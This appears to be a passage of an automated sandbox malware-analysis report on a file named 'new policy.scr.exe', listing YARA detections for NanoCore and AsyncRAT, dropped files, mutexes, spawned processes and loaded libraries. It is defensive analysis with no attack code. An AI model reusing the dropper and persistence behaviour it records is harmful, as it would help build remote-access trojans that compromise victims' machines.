Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000009.00000002.2363417540.0000000003E7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Networks!.exe PID: 3720, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: airlineagancy.casacam.net 7076.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: airlineagancy.casacam.net 7076.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: airlineagancy.casacam.net 7076.exe.0.dr, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: airlineagancy.casacam.net 7076.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: airlineagancy.casacam.net 7076.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.troj.evad.winEXE@12/9@19/1
Source: C:\Users\user\Desktop\new policy.scr.exe File created: C:\Users\user\AppData\Roaming\Networks!.exe
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Mutant created: \Sessions\1\BaseNamedObjects\BGCigTdLypaes6Nr
Source: C:\Users\user\AppData\Roaming\Networks!.exe Mutant created: NULL
Source: C:\Users\user\Desktop\new policy.scr.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{7065c9a5-e7ef-4b4a-9ad2-3b36dc826073}
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:64:WilError_03
Source: C:\Users\user\Desktop\new policy.scr.exe File created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe
Source: new policy.scr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: new policy.scr.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\new policy.scr.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\new policy.scr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: new policy.scr.exe ReversingLabs: Detection: 55%
Source: new policy.scr.exe Virustotal: Detection: 56%
Source: C:\Users\user\Desktop\new policy.scr.exe File read: C:\Users\user\Desktop\new policy.scr.exe
Source: unknown Process created: C:\Users\user\Desktop\new policy.scr.exe "C:\Users\user\Desktop\new policy.scr.exe"
Source: C:\Users\user\Desktop\new policy.scr.exe Process created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe "C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe"
Source: C:\Users\user\Desktop\new policy.scr.exe Process created: C:\Users\user\Desktop\new policy.scr.exe "C:\Users\user\Desktop\new policy.scr.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: C:\Users\user\AppData\Roaming\Networks!.exe Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: C:\Users\user\AppData\Roaming\Networks!.exe Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: C:\Users\user\Desktop\new policy.scr.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1336
Source: C:\Users\user\Desktop\new policy.scr.exe Process created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe "C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe" Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Process created: C:\Users\user\Desktop\new policy.scr.exe "C:\Users\user\Desktop\new policy.scr.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe" Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Section loaded: ntmarta.dll Jump to behavior
